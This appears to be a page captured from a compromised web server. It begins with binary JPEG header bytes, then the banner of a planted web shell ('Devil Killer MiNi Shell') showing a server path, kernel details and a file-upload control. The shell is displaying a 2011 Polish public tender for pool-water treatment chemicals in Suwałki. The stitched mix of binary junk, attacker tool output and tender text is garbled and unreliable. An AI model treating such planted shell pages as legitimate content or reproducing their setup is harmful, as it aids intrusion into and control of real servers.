JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110204/41653-N-2011.html

<p class="kh_header"><b>Suwałki: Dostawa środków  do uzdatniania wody basenowej  do Ośrodka Sportu i Rekreacji w Suwałkach</b><br>
<b>Numer ogłoszenia: 41653 - 2011; data zamieszczenia: 04.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji , ul. Wojska Polskiego 2, 16-400 Suwałki, woj. podlaskie, tel. 0-87 5663282, 5667811, faks 0-87 5631856.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osir.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków  do uzdatniania wody basenowej  do Ośrodka Sportu i Rekreacji w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Sukcesywna dostawa w 2011 roku środków  do uzdatniania wody basenowej  do Ośrodka Sportu i Rekreacji w Suwałkach.  

Część 1.  Sukcesywna dostawa chemii do uzdatniania wody basenowej  na potrzeby Aquaparku zlokalizowanego przy ul. Papieża Jana Pawła II 7. 

Zadanie 1. Ph minus w płynie, roztwór kwasu siarkowego o stężeniu od 50% do 51 % w ilości 2940kg dostarczony w pojemnikach o pojemności minimum 28kg do maksimum 30kg.  

Zadanie 2.  Szybkokrystalizujący płyn zawierający chlorek wodorotlenek siarczan poliglinu w ilości 2625kg,  w pojemnikach o pojemności minimum 25kg do maksimum 30kg.

Zadanie 3. Sól tabletkowana, czystość elektrolityczna o kolorze biało - błękitnym w ilości  3000kg. 

Zadanie 4. Koncentrat glonobójczy przeciw rozwojowi glonów w ilości 100kg dostarczany w opakowaniach minimum 25kg do maksimum 30kg, nie pieniący, nie zmienia wartości pH wody. 

Zadanie 5.  Solanka do inhalacji jodowo- bromowa nasycona w ilości 310kg.  

Część 2.  Sukcesywna dostawa środków do uzdatniania wody basenowej na pływalnie Ośrodka Sportu i Rekreacji w Suwałkach ul. Wojska Polskiego 2. 

Zakres zamówienia obejmuje dostawy następujących środków do uzdatniania wody:

Zadanie 1. Podchloryn sodowy w ilości 6000kg.  (NaOCL), zawartość  minimum 12% - maksimum 15% roztwór zawierającego aktywnego chloru.

Zadanie 2. Siarczan glinu 350 kg(AL2(SO4)3.nH20(14,3n<14,5), siarczan (VI) glinu - o przeliczeniowej zawartości 17% AL2O3 granulacja 0,8 - 4,0 mm. 

Zadanie 3. Alba lub równoważny w ilości 150kg - w opakowaniu 30kg - płyn do dezynfekcji wody basenowej o działaniu bakteriobójczym i przeciw glonom, zawiera substancje czynne benzododeciniumchlorid CAS139-07-1, zawiera 8,5%(85 mg/g) .chlorek benzododecynowy, produkt płynny nisko pieniący), nadaje się do stosowania równocześnie z innymi chemikaliami i chlorem.

Zadanie 4. Compactal lub równoważny  w ilości 70 litrów środek czyszczący do basenów, rozpuszcza wapno i osady, zawiera kwas solny 10% C< 25%; kwas fosforowy 5% C<10%., usuwa osady glonowe i brązowe, które są wynikiem dużej zawartości żelaza i magnezu. 

Zadanie 5. Calcid pH Minus płyn 49%  lub równoważny w ilości 500kg preparat do obniżenia pH wody basenowej.

Zadanie 6. Kwas solny 34% w ilości 2500kg kwas chlorowodorowy.
  
Zadanie 7. Soda kaustyczna  w ilości 200kg NAOH  98,5 - 100 %. 

Zadanie 8. Ph minus- granulat w ilości 4kg. 

Zadanie 9. Chemochlor T granulat 65 lub równoważny w ilości  6kg: stabilizowany granulat chlorujący o konsystencji stałej, z zawartością chloru ok. 56%. 

Zadanie 10. Krople HANNA Instruments Free Chlorine Reagant lub równoważne w ilości 240 ml., opakowanie buteleczki po min. 20 ml.

2.	Jeżeli w opisie przedmiotu zamówienia pojawia się nazwa produktu lub producenta, albo jeżeli zapisy wyraźnie wskazują na określony produkt lub producenta Wykonawca może zawsze zaproponować preparaty równoważne. Wykazanie równoważności i spełnienie wymagań określonych przez Zamawiającego spoczywa na Wykonawcy poprzez załączenie opisów, folderów, katalogów, specyfikacji technicznej, opisów technicznych itp.
3.	Wszystkie produkty muszą być dostarczone do Zamawiającego w oryginalnie zamkniętych pojemnikach. Na wszystkich opakowaniach winien być opis w języku polskim. 
4.	Każda dostarczona partia zamówionych produktów musi mieć okres przydatności do użycia co najmniej na 6 miesięcy licząc od dnia dostarczonej partii.
5.	Przyjęte ilości towaru stanowią przewidywane, szacunkowe zapotrzebowanie w okresie obowiązywania umowy. Zamawiający zastrzega sobie prawo do zmiany ilościowej w poszczególnych asortymentach w zależności od potrzeb. Przy zmianach ilościowych obowiązują ceny jednostkowe podane w ofercie. 
6.	Wykonawcy nie przysługują roszczenia z tytułu  nie zamówienia maksymalnej planowanej ilości towaru w okresie obowiązywania umowy.
7.	Dostawę chemii basenowej należy realizować po otrzymaniu zamówienia faksem lub telefonicznego przez uprawnionego pracownika ze strony Zamawiającego. 
8.	Rozładunku dostawy, w tym wniesienia do pomieszczenia wskazanego przez Zamawiającego dokonują pracownicy Wykonawcy. 
9.	W przypadku dostawy środków nie spełniających norm jakościowych  np. zanieczyszczenia, w uszkodzonych pojemnikach  lub bez prawidłowego oznakowania, Wykonawca ma obowiązek na wniosek Zamawiającego, wymienić przedmiot dostawy w całości lub w części, nie później niż w ciągu 24 godzin, chyba że Zamawiający wyznaczy inny termin.
10.	W przypadku wątpliwości co do jakości chemii Zamawiający zleci wykonanie badań chemii w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami, kosztami badania laboratoryjnego zostanie obciążony Wykonawca. 
11.	Wykonawca poniesie koszty wymiany wody w nieckach basenowych w przypadku, gdy zostanie stwierdzona niezgodność dostarczonej i użytej chemii basenowej z obowiązującymi w tym zakresie normami. 
12.	W przypadku, gdy Zamawiający zmuszony będzie do zamknięcia pływalni w Aquaparku z powodu opóźnienia w dostawie chemii basenowej, dostarczenia chemii w złej jakości niezgodnie z zamówionymi parametrami, Wykonawca zobowiązany będzie zapłacić karę umowną  w wysokości  15.000 za każdy dzień postoju Aguaparku.
13.	Zamawiający wymaga aby każdy z oferowanych produktów posiadał zgodę Państwowego Zakładu Higieny (Atest Higieniczny) na dopuszczenie do obrotu na terytorium Polski oraz kartę charakterystyki produktu. Spełnienie warunku atestu powinno być  udokumentowane w ofercie poprzez załączenie do oferty: Atestu Higienicznego i karty charakterystyki. 
14.	W okresie obowiązywania umowy Zamawiający musi posiadać aktualne atesty, pozwolenia oraz karty charakterystyki na dostarczone przez wykonawcę środki do uzdatniania wody. W przypadku utraty ich ważności lub pojawienia się nowych, istotnych informacji dotyczących środków do uzdatniania wody - Wykonawca zobowiązany jest do niezwłocznego dostarczenia aktualnych dokumentów. 
15.	Przedmiot zamówienia musi spełniać wymagania Polskich Norm przenoszących europejskie normy zharmonizowane, jednocześnie musi on być wprowadzony do obrotu zgodnie z odpowiednimi przepisami. 
16.	Transport środków do uzdatniania wody do miejsca wskazanych przez Zamawiającego musi się odbywać zgodnie z obowiązującymi przepisami prawa. 
17.	Opakowania po środkach chemicznych do utylizacji lub ponownego wykorzystywania zagospodarowuje dostawca (dotyczy części nr 1 zamówienia)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.96.20.00-5, 14.40.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.	Wykonali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym czasie, co najmniej 2 dostawy chemii basenowej o wartości brutto nie mniejszej niż 60.000,00 zł każda, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy te został wykonane należycie -  zgodnie z załącznikiem nr 3 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca składa wraz z ofertą w odniesieni do każdego z produktów zgodę Państwowego Zakładu Higieny (Atest Higieniczny) na dopuszczenie do obrotu na terytorium Polski oraz kartę charakterystyki produktu. Dokumentny należy złożyć  w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę, na każdej stronie składanego dokumentu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zezwolenie na obrót produktem biobójczym</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osir.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji, 16-400 Suwałki, ul. Wojska Polskiego 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2011 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji, 16-400 Suwałki, ul. Wojska Polskiego 2, sekretariat, pok.205.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 21 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1.  Sukcesywna dostawa chemii do uzdatniania wody basenowej  na potrzeby Aquaparku zlokalizowanego przy ul. Papieża Jana Pawła II 7..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1.  Sukcesywna dostawa chemii do uzdatniania wody basenowej  na potrzeby Aquaparku zlokalizowanego przy ul. Papieża Jana Pawła II 7. 

Zadanie 1. Ph minus w płynie, roztwór kwasu siarkowego o stężeniu od 50% do 51 % w ilości 2940kg dostarczony w pojemnikach o pojemności minimum 28kg do maksimum 30kg.  

Zadanie 2.  Szybkokrystalizujący płyn zawierający chlorek wodorotlenek siarczan poliglinu w ilości 2625kg,  w pojemnikach o pojemności minimum 25kg do maksimum 30kg.

Zadanie 3. Sól tabletkowana, czystość elektrolityczna o kolorze biało - błękitnym w ilości  3000kg. 

Zadanie 4. Koncentrat glonobójczy przeciw rozwojowi glonów w ilości 100kg dostarczany w opakowaniach minimum 25kg do maksimum 30kg, nie pieniący, nie zmienia wartości pH wody. 

Zadanie 5.  Solanka do inhalacji jodowo- bromowa nasycona w ilości 310kg.  
2.	Jeżeli w opisie przedmiotu zamówienia pojawia się nazwa produktu lub producenta, albo jeżeli zapisy wyraźnie wskazują na określony produkt lub producenta Wykonawca może zawsze zaproponować preparaty równoważne. Wykazanie równoważności i spełnienie wymagań określonych przez Zamawiającego spoczywa na Wykonawcy poprzez załączenie opisów, folderów, katalogów, specyfikacji technicznej, opisów technicznych itp.
3.	Wszystkie produkty muszą być dostarczone do Zamawiającego w oryginalnie zamkniętych pojemnikach. Na wszystkich opakowaniach winien być opis w języku polskim. 
4.	Każda dostarczona partia zamówionych produktów musi mieć okres przydatności do użycia co najmniej na 6 miesięcy licząc od dnia dostarczonej partii.
5.	Przyjęte ilości towaru stanowią przewidywane, szacunkowe zapotrzebowanie w okresie obowiązywania umowy. Zamawiający zastrzega sobie prawo do zmiany ilościowej w poszczególnych asortymentach w zależności od potrzeb. Przy zmianach ilościowych obowiązują ceny jednostkowe podane w ofercie. 
6.	Wykonawcy nie przysługują roszczenia z tytułu  nie zamówienia maksymalnej planowanej ilości towaru w okresie obowiązywania umowy.
7.	Dostawę chemii basenowej należy realizować po otrzymaniu zamówienia faksem lub telefonicznego przez uprawnionego pracownika ze strony Zamawiającego. 
8.	Rozładunku dostawy, w tym wniesienia do pomieszczenia wskazanego przez Zamawiającego dokonują pracownicy Wykonawcy. 
9.	W przypadku dostawy środków nie spełniających norm jakościowych  np. zanieczyszczenia, w uszkodzonych pojemnikach  lub bez prawidłowego oznakowania, Wykonawca ma obowiązek na wniosek Zamawiającego, wymienić przedmiot dostawy w całości lub w części, nie później niż w ciągu 24 godzin, chyba że Zamawiający wyznaczy inny termin.
10.	W przypadku wątpliwości co do jakości chemii Zamawiający zleci wykonanie badań chemii w uprawnionym laboratorium. W razie stwierdzenia niezgodności z obowiązującymi normami, kosztami badania laboratoryjnego zostanie obciążony Wykonawca. 
11.	Wykonawca poniesie koszty wymiany wody w nieckach basenowych w przypadku, gdy zostanie stwierdzona niezgodność dostarczonej i użytej chemii basenowej z obowiązującymi w tym zakresie normami. 
12.	W przypadku, gdy Zamawiający zmuszony będzie do zamknięcia pływalni w Aquaparku z powodu opóźnienia w dostawie chemii basenowej, dostarczenia chemii w złej jakości niezgodnie z zamówionymi parametrami, Wykonawca zobowiązany będzie zapłacić karę umowną  w wysokości  15.000 za każdy dzień postoju Aguaparku.
13.	Zamawiający wymaga aby każdy z oferowanych produktów posiadał zgodę Państwowego Zakładu Higieny (Atest Higieniczny) na dopuszczenie do obrotu na terytorium Polski oraz kartę charakterystyki produktu. Spełnienie warunku atestu powinno być  udokumentowane w ofercie poprzez załączenie do oferty: Atestu Higienicznego i karty charakterystyki. 
14.	W okresie obowiązywania umowy Zamawiający musi posiadać aktualne atesty, pozwolenia oraz karty charakterystyki na dostarczone przez wykonawcę środki do uzdatniania wody. W przypadku utraty ich ważności lub pojawienia się nowych, istotnych informacji dotyczących środków do uzdatniania wody - Wykonawca zobowiązany jest do niezwłocznego dostarczenia aktualnych dokumentów. 
15.	Przedmiot zamówienia musi spełniać wymagania Polskich Norm przenoszących europejskie normy zharmonizowane, jednocześnie musi on być wprowadzony do obrotu zgodnie z odpowiednimi przepisami. 
16.	Transport środków do uzdatniania wody do miejsca wskazanych przez Zamawiającego musi się odbywać zgodnie z obowiązującymi przepisami prawa. 
17.	Opakowania po środkach chemicznych do utylizacji lub ponownego wykorzystywania zagospodarowuje dostawca (dotyczy części nr 1 zamówienia)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.96.20.00-5, 14.40.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2.  Sukcesywna dostawa środków do uzdatniania wody basenowej na pływalnie Ośrodka Sportu i Rekreacji w Suwałkach ul. Wojska Polskiego 2..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa środków do uzdatniania wody basenowej na pływalnie Ośrodka Sportu i Rekreacji w Suwałkach ul. Wojska Polskiego 2. 

Zakres zamówienia obejmuje dostawy następujących środków do uzdatniania wody:

Zadanie 1. Podchloryn sodowy w ilości 6000kg.  (NaOCL), zawartość  minimum 12% - maksimum 15% roztwór zawierającego aktywnego chloru.

Zadanie 2. Siarczan glinu 350 kg(AL2(SO4)3.nH20(14,3n<14,5), siarczan (VI) glinu - o przeliczeniowej zawartości 17% AL2O3 granulacja 0,8 - 4,0 mm. 

Zadanie 3. Alba lub równoważny w ilości 150kg - w opakowaniu 30kg - płyn do dezynfekcji wody basenowej o działaniu bakteriobójczym i przeciw glonom, zawiera substancje czynne benzododeciniumchlorid CAS139-07-1, zawiera 8,5%(85 mg/g) .chlorek benzododecynowy, produkt płynny nisko pieniący), nadaje się do stosowania równocześnie z innymi chemikaliami i chlorem.

